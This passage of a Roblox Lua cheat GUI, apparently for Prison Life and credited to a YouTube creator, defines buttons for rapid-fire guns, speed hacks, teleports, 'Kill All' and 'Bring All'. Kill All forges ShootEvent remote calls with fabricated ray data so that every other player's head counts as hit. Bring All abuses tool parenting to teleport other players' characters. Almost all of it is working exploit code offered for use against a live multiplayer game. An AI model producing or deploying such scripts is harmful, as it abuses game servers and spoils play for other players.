  4109. local Ray = Ray.new(Point_A, (Point_B - Point_A).Unit * (2 ^ 31 - 1))
  4110. local Part, Pos = workspace:FindPartOnRay(Ray, game.Players.LocalPlayer.Character)
  4111. local Dist = (Point_A - Pos).Magnitude
  4112. local CFrame = CFrame.new(Point_A, Pos) * CFrame.new(0, 0, -Dist / 2)
  4113.  
  4114. return CFrame, Dist, Ray
  4115. end
  4116.  
  4117. function FireLaser(target)
  4118. coroutine.resume(coroutine.create(function()
  4119. local C, D, R = CreateRay(Gun.Muzzle.CFrame.p, target.CFrame.p)
  4120. local Bullet = Instance.new("Part", Gun)
  4121. Bullet.BrickColor = BrickColor.Yellow()
  4122. Bullet.Material = "Neon"
  4123. Bullet.Anchored = true
  4124. Bullet.CanCollide = false
  4125. Bullet.Size = Vector3.new(0.2, 0.2, D)
  4126. Bullet.CFrame = C
  4127.  
  4128. local bulletTable = {}
  4129. table.insert(bulletTable, {
  4130. Hit = target,
  4131. Distance = D,
  4132. Cframe = C,
  4133. RayObject = R
  4134. })
  4135.  
  4136. game.ReplicatedStorage.ShootEvent:FireServer(bulletTable, Gun)
  4137. local C = Sound:Clone()
  4138. C.Parent = Gun
  4139. C:Play()
  4140. wait(0.05)
  4141. Bullet:Remove()
  4142. end))
  4143. end
  4144.  
  4145. Mouse.Button1Down:Connect(function()
  4146. Down = true
  4147. end)
  4148.  
  4149.  
  4150. Mouse.Button1Up:Connect(function()
  4151. Down = false
  4152. end)
  4153.  
  4154. while Run.Stepped:wait() do
  4155. if Down == true then
  4156. game.ReplicatedStorage.SoundEvent:FireServer(Sound, Gun)
  4157. FireLaser(Mouse.Target)
  4158. end
  4159. end
  4160. end)
  4161.  
  4162. fastak.Name = "fastak"
  4163. fastak.Parent = main
  4164. fastak.BackgroundColor3 = Color3.new(1, 0.333333, 0)
  4165. fastak.Position = UDim2.new(0.77959609, 0, 0.518048167, 0)
  4166. fastak.Size = UDim2.new(0, 79, 0, 32)
  4167. fastak.Font = Enum.Font.Bodoni
  4168. fastak.Text = "Fast AK47"
  4169. fastak.TextColor3 = Color3.new(0, 0, 0)
  4170. fastak.TextSize = 14
  4171. fastak.MouseButton1Down:connect(function()
  4172. local Player = game.Players.LocalPlayer.Name
  4173. local Gun = "AK47" -- < -- Gun Name
  4174. local Run = game:GetService("RunService")
  4175.  
  4176. Gun = game.Players[Player].Character[Gun]
  4177. local Mouse = game.Players.LocalPlayer:GetMouse()
  4178. local Down = false
  4179. local Sound = Gun.Handle.FireSound
  4180.  
  4181. function CreateRay(Point_A, Point_B)
  4182. local Ray = Ray.new(Point_A, (Point_B - Point_A).Unit * (2 ^ 31 - 1))
  4183. local Part, Pos = workspace:FindPartOnRay(Ray, game.Players.LocalPlayer.Character)
  4184. local Dist = (Point_A - Pos).Magnitude
  4185. local CFrame = CFrame.new(Point_A, Pos) * CFrame.new(0, 0, -Dist / 2)
  4186.  
  4187. return CFrame, Dist, Ray
  4188. end
  4189.  
  4190. function FireLaser(target)
  4191. coroutine.resume(coroutine.create(function()
  4192. local C, D, R = CreateRay(Gun.Muzzle.CFrame.p, target.CFrame.p)
  4193. local Bullet = Instance.new("Part", Gun)
  4194. Bullet.BrickColor = BrickColor.Yellow()
  4195. Bullet.Material = "Neon"
  4196. Bullet.Anchored = true
  4197. Bullet.CanCollide = false
  4198. Bullet.Size = Vector3.new(0.2, 0.2, D)
  4199. Bullet.CFrame = C
  4200.  
  4201. local bulletTable = {}
  4202. table.insert(bulletTable, {
  4203. Hit = target,
  4204. Distance = D,
  4205. Cframe = C,
  4206. RayObject = R
  4207. })
  4208.  
  4209. game.ReplicatedStorage.ShootEvent:FireServer(bulletTable, Gun)
  4210. local C = Sound:Clone()
  4211. C.Parent = Gun
  4212. C:Play()
  4213. wait(0.05)
  4214. Bullet:Remove()
  4215. end))
  4216. end
  4217.  
  4218. Mouse.Button1Down:Connect(function()
  4219. Down = true
  4220. end)
  4221.  
  4222.  
  4223. Mouse.Button1Up:Connect(function()
  4224. Down = false
  4225. end)
  4226.  
  4227. while Run.Stepped:wait() do
  4228. if Down == true then
  4229. game.ReplicatedStorage.SoundEvent:FireServer(Sound, Gun)
  4230. FireLaser(Mouse.Target)
  4231. end
  4232. end
  4233. end)
  4234.  
  4235. killall.Name = "killall"
  4236. killall.Parent = main
  4237. killall.BackgroundColor3 = Color3.new(1, 0, 0)
  4238. killall.Position = UDim2.new(0.0102345012, 0, 0.760852396, 0)
  4239. killall.Size = UDim2.new(0, 110, 0, 34)
  4240. killall.Font = Enum.Font.GothamBold
  4241. killall.Text = "Kill All"
  4242. killall.TextColor3 = Color3.new(0, 0, 0)
  4243. killall.TextSize = 14
  4244. killall.MouseButton1Down:connect(function()
  4245. workspace.Remote.TeamEvent:FireServer("Medium stone grey")
  4246.  
  4247. game.Workspace.Remote.ItemHandler:InvokeServer(workspace.Prison_ITEMS.giver["Remington 870"].ITEMPICKUP)
  4248.  
  4249. wait(0.5)
  4250. function kill(a)
  4251. local A_1 =
  4252. {
  4253. [1] =
  4254. {
  4255. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-391.152252, 8.65560055, -83.2166901)),
  4256. ["Distance"] = 3.2524313926697,
  4257. ["Cframe"] = CFrame.new(840.310791, 101.334137, 2267.87988, 0.0636406094, 0.151434347, -0.986416459, 0, 0.988420188, 0.151741937, 0.997972965, -0.00965694897, 0.0629036576),
  4258. ["Hit"] = a.Character.Head
  4259. },
  4260.   [2] =
  4261. {
  4262. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-392.481476, -8.44939327, -76.7261353)),
  4263. ["Distance"] = 3.2699294090271,
  4264. ["Cframe"] = CFrame.new(840.290466, 101.184189, 2267.93506, 0.0964837447, 0.0589403138, -0.993587971, 4.65661287e-10, 0.998245299, 0.0592165813, 0.995334625, -0.00571343815, 0.0963144377),
  4265. ["Hit"] = a.Character.Head
  4266. },
  4267. [3] =
  4268. {
  4269. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-389.21701, -2.50536323, -92.2163162)),
  4270. ["Distance"] = 3.1665518283844,
  4271. ["Cframe"] = CFrame.new(840.338867, 101.236496, 2267.80371, 0.0166504811, 0.0941716284, -0.995416701, 1.16415322e-10, 0.995554805, 0.0941846818, 0.999861419, -0.00156822044, 0.0165764652),
  4272. ["Hit"] = a.Character.Head
  4273. },
  4274. [4] =
  4275. {
  4276. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-393.353973, 3.13988972, -72.5452042)),
  4277. ["Distance"] = 3.3218522071838,
  4278. ["Cframe"] = CFrame.new(840.277222, 101.285957, 2267.9707, 0.117109694, 0.118740402, -0.985994935, -1.86264515e-09, 0.992826641, 0.119563118, 0.993119001, -0.0140019981, 0.116269611),
  4279. ["Hit"] = a.Character.Head
  4280. },
  4281. [5] =
  4282. {
  4283. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-390.73172, 3.2097764, -85.5477524)),
  4284. ["Distance"] = 3.222757101059,
  4285. ["Cframe"] = CFrame.new(840.317993, 101.286423, 2267.86035, 0.0517584644, 0.123365127, -0.991010666, 0, 0.992340803, 0.123530701, 0.99865967, -0.00639375951, 0.0513620302),
  4286. ["Hit"] = a.Character.Head
  4287. }
  4288. }
  4289. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  4290. local Event = game:GetService("ReplicatedStorage").ShootEvent
  4291. Event:FireServer(A_1, A_2)
  4292. Event:FireServer(A_1, A_2)
  4293. end
  4294.  
  4295. for i,v in pairs(game.Players:GetChildren())do
  4296. if v.Name ~= game.Players.LocalPlayer.Name then
  4297. kill(v)
  4298. end
  4299. end
  4300. wait(1)
  4301. workspace.Remote.TeamEvent:FireServer("Bright orange")
  4302. end)
  4303.  
  4304. btools.Name = "btools"
  4305. btools.Parent = main
  4306. btools.BackgroundColor3 = Color3.new(0, 1, 1)
  4307. btools.Position = UDim2.new(0.678933322, 0, 0.2304198, 0)
  4308. btools.Size = UDim2.new(0, 111, 0, 32)
  4309. btools.Font = Enum.Font.GothamBold
  4310. btools.Text = "Btools"
  4311. btools.TextColor3 = Color3.new(1, 0, 0)
  4312. btools.TextSize = 14
  4313. btools.MouseButton1Down:connect(function()
  4314. local tool1   = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  4315. tool1.BinType = "Hammer"
  4316. end)
  4317.  
  4318. speed.Name = "speed"
  4319. speed.Parent = main
  4320. speed.BackgroundColor3 = Color3.new(0.333333, 1, 1)
  4321. speed.Position = UDim2.new(0.350194454, 0, 0.379678607, 0)
  4322. speed.Size = UDim2.new(0, 110, 0, 32)
  4323. speed.Font = Enum.Font.GothamBold
  4324. speed.Text = "Speed"
  4325. speed.TextColor3 = Color3.new(1, 0, 0)
  4326. speed.TextSize = 14
  4327. speed.MouseButton1Down:connect(function()
  4328. Speed = "100" -- Change to how fast you want to go
  4329.  
  4330. player = game.Players.LocalPlayer.Character
  4331. power = "WalkSpeed"
  4332. player.Humanoid[power] = Speed
  4333. wait()
  4334. player.HumanoidRootPart.CustomPhysicalProperties = PhysicalProperties.new(9e99, 9e99, 9e99, 9e99, 9e99)
  4335. wait()
  4336. repeat
  4337. game.Workspace.Gravity = 1000
  4338. wait()
  4339. game.Players.LocalPlayer.Character.Humanoid.JumpPower = 287.5
  4340. wait()
  4341. until game.Players.LocalPlayer.Character.Humanoid.Health == 0
  4342. end)
  4343.  
  4344. respawn.Name = "respawn"
  4345. respawn.Parent = main
  4346. respawn.BackgroundColor3 = Color3.new(0.333333, 1, 1)
  4347. respawn.Position = UDim2.new(0.68041873, 0, 0.379084349, 0)
  4348. respawn.Size = UDim2.new(0, 111, 0, 32)
  4349. respawn.Font = Enum.Font.GothamBold
  4350. respawn.Text = "Fast Respawn"
  4351. respawn.TextColor3 = Color3.new(1, 0, 0)
  4352. respawn.TextSize = 14
  4353. respawn.MouseButton1Down:connect(function()
  4354. local A_1 = "\66\114\111\121\111\117\98\97\100\100"
  4355. local Event = game:GetService("Workspace").Remote.loadchar
  4356. Event:InvokeServer(A_1)
  4357. end)
  4358.  
  4359. Credits.Name = "Credits"
  4360. Credits.Parent = main
  4361. Credits.BackgroundColor3 = Color3.new(0, 0, 0)
  4362. Credits.Position = UDim2.new(0.0242873691, 0, 0.934491813, 0)
  4363. Credits.Size = UDim2.new(0, 352, 0, 31)
  4364. Credits.Font = Enum.Font.GothamBold
  4365. Credits.Text = "Made by JAKE11PRICE on YouTube"
  4366. Credits.TextColor3 = Color3.new(1, 1, 0)
  4367. Credits.TextSize = 14
  4368.  
  4369. prison.Name = "prison"
  4370. prison.Parent = main
  4371. prison.BackgroundColor3 = Color3.new(0, 1, 1)
  4372. prison.Position = UDim2.new(0.681462109, 0, 0.450664163, 0)
  4373. prison.Size = UDim2.new(0, 110, 0, 32)
  4374. prison.Font = Enum.Font.GothamBlack
  4375. prison.Text = "Prison"
  4376. prison.TextColor3 = Color3.new(1, 0, 0)
  4377. prison.TextSize = 14
  4378. prison.MouseButton1Down:connect(function()
  4379. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(918.77,100,2379.07)
  4380. end)
  4381.  
  4382. yard.Name = "yard"
  4383. yard.Parent = main
  4384. yard.BackgroundColor3 = Color3.new(0.333333, 1, 1)
  4385. yard.Position = UDim2.new(0.0127276238, 0, 0.45231539, 0)
  4386. yard.Size = UDim2.new(0, 110, 0, 32)
  4387. yard.Font = Enum.Font.GothamBlack
  4388. yard.Text = "Yard"
  4389. yard.TextColor3 = Color3.new(1, 0, 0)
  4390. yard.TextSize = 14
  4391. yard.MouseButton1Down:connect(function()
  4392. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(779.87,98,2458.93)
  4393. end)
  4394.  
  4395. crimbase.Name = "crimbase"
  4396. crimbase.Parent = main
  4397. crimbase.BackgroundColor3 = Color3.new(0.333333, 1, 1)
  4398. crimbase.Position = UDim2.new(0.348744512, 0, 0.451209784, 0)
  4399. crimbase.Size = UDim2.new(0, 110, 0, 32)
  4400. crimbase.Font = Enum.Font.GothamBlack
  4401. crimbase.Text = "Crim Base"
  4402. crimbase.TextColor3 = Color3.new(1, 0, 0)
  4403. crimbase.TextSize = 14
  4404. crimbase.MouseButton1Down:connect(function()
  4405. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-943.46,94.13,2063.63)
  4406. end)
  4407.  
  4408. title_2.Name = "title"
  4409. title_2.Parent = main
  4410. title_2.BackgroundColor3 = Color3.new(0.333333, 1, 0)
  4411. title_2.Position = UDim2.new(0.000689314213, 0, 0.592849016, 0)
  4412. title_2.Size = UDim2.new(0, 364, 0, 26)
  4413. title_2.Font = Enum.Font.GothamBold
  4414. title_2.Text = "FUN FE COMMANDS!"
  4415. title_2.TextColor3 = Color3.new(0, 0, 0)
  4416. title_2.TextSize = 14
  4417.  
  4418. bringall.Name = "bringall"
  4419. bringall.Parent = main
  4420. bringall.BackgroundColor3 = Color3.new(1, 1, 0)
  4421. bringall.Position = UDim2.new(0.0220828541, 0, 0.704794765, 0)
  4422. bringall.Size = UDim2.new(0, 111, 0, 25)
  4423. bringall.Font = Enum.Font.GothamBold
  4424. bringall.Text = "Bring All"
  4425. bringall.TextColor3 = Color3.new(0, 0, 0)
  4426. bringall.TextSize = 14
  4427. bringall.MouseButton1Down:connect(function()
  4428. workspace.Remote.TeamEvent:FireServer("Bright blue")
  4429.  
  4430. local LocalPlayer = game:GetService("Players").LocalPlayer
  4431. local runservice = game:GetService("RunService")
  4432. local characters = {}
  4433. LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools()
  4434. local currentamount = #LocalPlayer.Backpack:GetChildren()
  4435. LocalPlayer.Character.Archivable = true
  4436. local tempchar = LocalPlayer.Character:Clone()
  4437. tempchar.Parent = workspace
  4438. local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame
  4439. local renderstepped = runservice.RenderStepped:Connect(function()
  4440.     workspace.CurrentCamera.CameraSubject = tempchar:FindFirstChild("Humanoid")
  4441.     for _, tool in pairs(LocalPlayer.Backpack:GetChildren()) do
  4442.     if tool:IsA("Tool") then
  4443.             tool.Parent = LocalPlayer
  4444.         end
  4445.     end
  4446.     LocalPlayer.Character:ClearAllChildren()
  4447.     local char = Instance.new("Model", workspace)
  4448.     table.insert(characters, char)
  4449.     Instance.new("Humanoid", char)
  4450.     LocalPlayer.Character = char
  4451.     repeat runservice.RenderStepped:Wait() until LocalPlayer.Character ~= nil
  4452. end)
  4453. repeat runservice.RenderStepped:Wait() until #LocalPlayer:GetChildren() - 2 - currentamount >= #game.Players:GetPlayers() * 6
  4454. renderstepped:Disconnect()
  4455. repeat runservice.RenderStepped:Wait() until LocalPlayer.Character:FindFirstChild("HumanoidRootPart") ~= nil
  4456. for _, char in pairs(characters) do
  4457.     char:Destroy()
  4458. end
  4459. for _, tool in pairs(LocalPlayer:GetChildren()) do
  4460.     if tool:IsA("Tool") then
  4461.         tool.Parent = LocalPlayer.Backpack
  4462.     end
  4463. end
  4464. LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos
  4465. tempchar:Destroy()
  4466.  
  4467. wait()
  4468.  
  4469. for i, v in pairs(game.Players:GetPlayers()) do
  4470. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4471.  
  4472. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4473.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4474.  
  4475.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4476.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4477.   wait()
  4478.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4479.  
  4480. end
  4481. wait(.1)
  4482.  
  4483. end
  4484. for i, v in pairs(game.Players:GetPlayers()) do
  4485. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4486.  
  4487. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4488.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4489.  
  4490.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4491.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4492.   wait()
  4493.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4494.  
  4495. end
  4496. wait(0.01)
  4497.  
  4498. end
  4499. for i, v in pairs(game.Players:GetPlayers()) do
  4500. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4501.  
  4502. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4503.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4504.  
  4505.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4506.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4507.   wait()
  4508.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4509.  
  4510. end
  4511. wait(0.01)
  4512.  
  4513. end
  4514. for i, v in pairs(game.Players:GetPlayers()) do
  4515. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4516.  
  4517. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4518.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4519.  
  4520.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4521.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4522.   wait()
  4523.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4524.  
  4525. end
  4526. wait(0.01)
  4527.  
  4528. end
  4529. for i, v in pairs(game.Players:GetPlayers()) do
  4530. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4531.  
  4532. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4533.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4534.  
  4535.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4536.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4537.   wait()
  4538.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4539.  
  4540. end
  4541. wait(0.01)
  4542.  
  4543. end
  4544. for i, v in pairs(game.Players:GetPlayers()) do
  4545. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4546.  
  4547. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4548.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4549.  
  4550.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4551.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4552.   wait()
  4553.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4554.  
  4555. end
  4556. wait(0.01)
  4557.  
  4558. end
  4559. for i, v in pairs(game.Players:GetPlayers()) do
  4560. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4561.  
  4562. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4563.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4564.  
  4565.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4566.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4567.   wait()
  4568.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4569.  
  4570. end
  4571. wait(0.01)
  4572.  
  4573. end
  4574. for i, v in pairs(game.Players:GetPlayers()) do
  4575. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4576.  
  4577. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4578.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4579.  
  4580.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4581.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4582.   wait()
  4583.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4584.  
  4585. end
  4586. wait(0.01)
  4587.  
  4588. end
  4589. for i, v in pairs(game.Players:GetPlayers()) do
  4590. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4591.  
  4592. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4593.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4594.  
  4595.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4596.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4597.   wait()
  4598.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4599.  
  4600. end
  4601. wait(0.01)
  4602.  
  4603. end
  4604. for i, v in pairs(game.Players:GetPlayers()) do
  4605. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4606.  
  4607. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4608.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4609.  
  4610.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4611.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4612.   wait()
  4613.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4614.  
  4615. end
  4616. wait(0.01)
  4617.  
  4618. end
  4619. for i, v in pairs(game.Players:GetPlayers()) do
  4620. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4621.  
  4622. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4623.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4624.  
  4625.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4626.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4627.   wait()
  4628.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4629.  
  4630. end
  4631. wait(0.01)
  4632.  
  4633. end
  4634. for i, v in pairs(game.Players:GetPlayers()) do
  4635. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4636.  
  4637. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4638.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4639.  
  4640.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4641.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4642.   wait()
  4643.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4644.  
  4645. end
  4646. wait(0.01)
  4647.  
  4648. end
  4649. for i, v in pairs(game.Players:GetPlayers()) do
  4650. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4651.  
  4652. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4653.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4654.  
  4655.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4656.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4657.   wait()
  4658.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4659.  
  4660. end
  4661. wait(0.01)
  4662.  
  4663. end
  4664. for i, v in pairs(game.Players:GetPlayers()) do
  4665. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4666.  
  4667. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4668.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4669.  
  4670.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4671.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4672.   wait()
  4673.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4674.  
  4675. end
  4676. wait(0.01)
  4677.  
  4678. end
  4679. for i, v in pairs(game.Players:GetPlayers()) do
  4680. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4681.  
  4682. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4683.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4684.  
  4685.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4686.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4687.   wait()
  4688.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4689.  
  4690. end
  4691. wait(0.01)
  4692.  
  4693. end
  4694. for i, v in pairs(game.Players:GetPlayers()) do
  4695. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4696.  
  4697. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4698.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4699.  
  4700.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4701.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4702.   wait()
  4703.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4704.  
  4705. end
  4706. wait(0.01)
  4707.  
  4708. end
  4709. for i, v in pairs(game.Players:GetPlayers()) do
  4710. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4711.  
  4712. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4713.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4714.  
  4715.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
